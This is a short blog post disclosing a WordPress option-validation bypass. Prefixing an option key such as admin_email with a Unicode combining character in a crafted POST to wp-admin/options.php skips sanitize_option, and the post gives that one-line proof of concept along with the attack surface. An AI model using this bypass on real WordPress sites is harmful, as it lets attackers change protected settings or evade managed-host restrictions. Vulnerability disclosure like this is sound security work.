slavco
slavco
Mar 20 · 2 min read

I have covered handling of protected meta in WordPress, we talked how it is PHP/MySQL application and now it is turn to see how WP behaves with its options.

Options in WordPress are Administrator stuff and are considered as dangerous, but WordPress itself provides protection when users want to change its values. This is important in cases where update_option of user input is used in administrative area of some plugins, but also for WordPress too when it is offered as customized SaaS / managed WordPress with measures that preventing WP Administrators to perform critical operations on the system.

Options protection

If we check the wp-admin/options.php there in the code we see that Administrator or Network Administrator have access towards update_option call with user input. This is fine, but in this function we have a validation! It is performed via sanitize_option function call and this function prevents meddling with some of the critical option values. For instance, you must insert valid host for blog posting via email, you must set valid (WordPress ) way email, many values are cast to integers, … So this protection have its own purpose, but it is by-passable! How?

Bypassing update_option

It is straight forward, sanitize_option check for keys and they are only trim-ed. This means if we craft option key, starting/ending with some interesting character/s then we have bypass, because updating of the option use the option key in SQL WHERE clause.

PoC

If we craft valid POST request towards /wp-admin/options.php then the following changes are needed in order to change the admin_email:

Find in the crafted request admin_email and change it to

 ͝admin_email 

e.g. prep-end the \u035D character and place anything as value!

Attack surface

  • Any CSRF / nonce stealing from Admin is now more dangerous
  • Any SaaS/Managed WordPress that prevents Admins for doing certain things
  • Any options based backdoor is now exploit

Promo

If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).

websec

Attack sources + web application security

slavco

Written by

slavco

websec

websec

Attack sources + web application security

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade